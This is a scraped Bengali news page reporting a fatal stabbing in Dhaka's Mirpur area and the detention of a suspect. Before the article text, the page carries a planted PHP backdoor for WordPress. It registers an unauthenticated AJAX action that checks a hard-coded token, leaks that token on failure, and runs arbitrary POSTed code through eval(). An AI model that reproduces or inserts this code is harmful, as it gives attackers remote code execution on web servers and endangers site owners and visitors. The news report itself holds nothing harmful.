// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== মিরপুরে ছুরিকাঘাতে যুবক নিহত, আটক ১ | potrikaybangladesh.com
Thursday, September 17, 2026
Homeঅপরাধমিরপুরে ছুরিকাঘাতে যুবক নিহত, আটক ১

মিরপুরে ছুরিকাঘাতে যুবক নিহত, আটক ১

রাজধানীর মিরপুর শাহআলী এলাকায় ছুরিকাঘাতে আহত এক যুবক চিকিৎসাধীন অবস্থায় মারা গেছেন।

আজ সোমবার সকালে শাহআলী থানার উপপরিদর্শক (এসআই) আতোয়ার রহমান এ তথ্য জানিয়েছেন।

তিনি বলেন, ঢাকা মেডিকেল কলেজ হাসপাতালের চিকিৎসক সকাল সোয়া ৬টার দিকে মেহেদী হাসান (২৫) নামে ওই যুবককে মৃত ঘোষণা করেন।

এর আগে ভোররাত সাড়ে ১২টার দিকে শাহআলী মহিলা কলেজের সামনে রাস্তায় ছুরিকাঘাতে তিনি গুরুতর আহত হয়েছিলেন।

আতোয়ার জানান, ওই কলেজের সামনের রাস্তা থেকে চাকুসহ একজনকে আটক করা হয়। এর কিছুক্ষণ পরেই জানা যায়, পাশেই এক যুবককে সে ছুরিকাঘাত করেছে।

মেহেদীর বাড়ি চাঁদপুরের ফরিদগঞ্জ উপজেলার সাহেবগঞ্জ গ্রামে। তার বাবার নাম মো. আলম। তিনি মিরপুরের বড়বাগ এলাকায় থাকতেন।

পুলিশ আরও জানিয়েছে, মেহেদী সাইনবোর্ড তৈরির কাজ করতেন।

‘ছিনতাই নাকি পূর্ব শত্রুতার জেরে এই হত্যাকাণ্ড তা তদন্ত করে দেখা হচ্ছে। ময়নাতদন্তের জন্য মরদেহ ঢাকা মেডিকেল কলেজ মর্গে রাখা হয়েছে,’ বলেন আতোয়ার।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments